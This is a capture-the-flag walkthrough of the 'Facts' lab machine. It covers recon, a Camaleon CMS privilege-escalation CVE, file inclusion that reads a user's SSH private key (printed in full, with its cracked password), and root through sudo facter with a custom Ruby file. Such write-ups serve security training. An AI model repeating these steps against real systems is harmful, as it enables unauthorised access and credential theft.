Facts

Information Gathering

> nmap 10.129.22.202 -sCV -p- --open

• 22
  • SSH is blocked by authentication
• 80
  • HTTP hosting a simple website with facts to read.
• 54321 HTTP – redirect to 9001

Exploitation

• By walking the site, we find an admin login page by reading the page source.
• From there we are able to create a new admin account.
  • This new account doesn’t have full privileges.
• However, we see that it is using Camaleon CMS version 2.9.0
  • This has a Mass Assignment vulnerability for Privilege Escalation
  • CVE-2025-2304
  • We can use this proof of concept: https://github.com/d3vn0mi/cve-2025-2304-poc
• Using the exploit, we get access to the admin panel.
  • This website is using Ruby. So we can try to get a ruby Reverse shell by uploading a file.
  • I think this may be possible as well with more time.
• Instead, using another CVE we get file inclusion.
• With the exploit we read /home/trivia/.ssh/id_ed25519
  • This will output the user’s private ssh key:

——BEGIN OPENSSH PRIVATE KEY—– b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBBjiZADO dtctyuCfPvlK6JAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIBGGQJW4pNnMqYSI CpzP1BZ+GsR5Sox+8tBAIsX2Ev9RAAAAoI3/9swkZHFRnU1w+ylzRNebxOWg5T+9HRDi/s PFWehTZVCrG8AliD7+Sfdal2IMDeR4Y7gyJRtWHOfuCnbXvFy0nIbEENRGBBs6mpMp6Gp8 HrRnw5L1fzdbEREr4AKUrDEijp2sUAt1ybzj0WQclSXPOSEwDk+OSj5Z1P2CeYKKIPrLKz Swqe9ptBowCkgZ3WFJeX2uStN2YSXcytaClwo= —–END OPENSSH PRIVATE KEY—–

To crack this key we:

1. Use ssh2john trivia_private_key

2. Then john --wordlist=/user/share/wordlists/rockyou.txt trivia_ssh Where trivia_private_key is a file with the obtained key and trivia_ssh it the output of ssh2john

   The resulting ssh password for user trivia: dragonballz – nice

Then connect to the server: ssh -i trivia_private_key [email protected]

• After running this we see we need to change the file permissions to 600.
  • chmod 600 trivia_private_key

Then, connect via ssh using the found password.

Privilege Escalation

• Put linpeas.sh on target
  • scp -i htb/facts/trivia_private_key ~/linpeas.sh [email protected]:~/linpeas.sh and again the found password
• We can see a result from linpeas:

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

• We can see the same when we use sudo -l

facter is a command-line tool that gathers facts about nodes (systems) such as hardware details, network settings, OS type and version, and more. These facts are made available as variables in your Puppet manifests and can be used to inform conditional expressions in Puppet

• Given that the name of the box is “facts” we can assume that this is the correct attack vector for PE. Again on the github page:

Resolvers have the role of gathering data from the system. For example a resolver can execute a command on the system, can read a file or any operation that retrieves some data from a single source on the system.

So, given that we can run facter with sudo, maybe we can execute a command on the system through facter.

• To do this, it looks like we use the setcode option. https://help.puppet.com/core/current/Content/PuppetCore/executing_shell_commands_in_facts.htm

• To get the output of uname –hardware-platform to single out a specific type of workstation, you create a custom fact.
• To run a command and use the output verbatim, as your fact’s value, you can pass the command into setcode directly. For example: setcode 'uname --hardware-platform'

I was unable to get facter to run a custom fact in the aforementioned way. Instead, looking on GTFObins you can find a Ruby shell where we create a .rb file in /tmp and point facter to this directory by running sudo facter --custom-dir /tmp shell.rb. This gives us our root shell.